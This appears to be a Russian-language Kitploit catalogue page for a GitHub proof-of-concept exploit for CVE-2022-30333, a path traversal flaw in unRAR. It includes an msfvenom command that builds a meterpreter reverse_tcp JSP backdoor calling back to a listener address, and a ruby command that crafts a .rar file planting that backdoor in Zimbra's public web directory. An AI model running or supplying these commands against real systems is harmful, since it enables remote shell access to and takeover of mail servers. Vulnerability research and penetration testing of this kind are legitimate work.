Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
unrar-cve-2022-30333-poc — Эксплойт доказательства концепции для обхода пути CVE-2022-30333 в unRAR, создающий вредоносные .rar-файлы для размещения полезных нагрузок в произвольных местах. Интегрируется с Metasploit и msfvenom для тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/rbowes-r7/unrar-cve-2022-30333-poc
Фреймворки для эксплойтовГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubrbowes-r7/unrar-cve-2022-30333-poc

unrar-cve-2022-30333-poc

Эксплойт доказательства концепции для обхода пути CVE-2022-30333 в unRAR, создающий вредоносные .rar-файлы для размещения полезных нагрузок в произвольных местах. Интегрируется с Metasploit и msfvenom для тестирования на проникновение.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1454 лет назадЕщё не проверено

Доказательство концепции для CVE-2022-30333 - уязвимость обхода пути в unRAR версиях до 6.11. Я создал это как демонстрацию эксплойта для статьи на AttackerKB и надеюсь вскоре включить его в модуль Metasploit!

По сути, вы указываете цель (включая обход пути) и некоторые данные файла, и этот инструмент сгенерирует .rar, который извлечет этот файл в указанное место. Максимальная длина файла составляет 104 байта, а максимальная длина файла — 4096 байт. (Это не связано с самой уязвимостью, это просто значения, которые я выбрал при генерации файла).

Например, сгенерируйте бэкдор с помощью msfvenom:

root@kitploit:~
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

Затем создайте .rar-файл, разместив .jsp в интересном месте:

root@kitploit:~
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
Скачать инструмент